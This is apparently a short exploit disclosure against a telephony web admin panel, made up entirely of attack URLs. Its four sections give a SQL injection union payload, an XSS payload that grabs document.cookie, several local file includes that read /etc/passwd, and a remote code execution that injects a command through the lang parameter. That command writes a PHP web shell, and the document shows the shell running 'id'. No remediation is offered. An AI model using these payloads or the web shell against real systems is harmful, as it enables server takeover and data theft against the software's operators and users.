[1] SQL Injectiuon

Http://www.example.com/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1'
and 1=2 union select 1,2,3,4,5,6-- -

[2] Cross Site Scripting


Http://www.example.com/user/help/html/index.php?id_nodo="
onmouseover%3dprompt(document.cookie) bad%3d"


[3] Multiple Local File Include


Http://www.example.com/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00

Http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00

Http://www.example.com/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00

Http://www.example.com/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00

[4] Remote Code Execution
===========================

Http://www.example.com/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php

Your Shell

Http://www.example.com/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
####################################################################

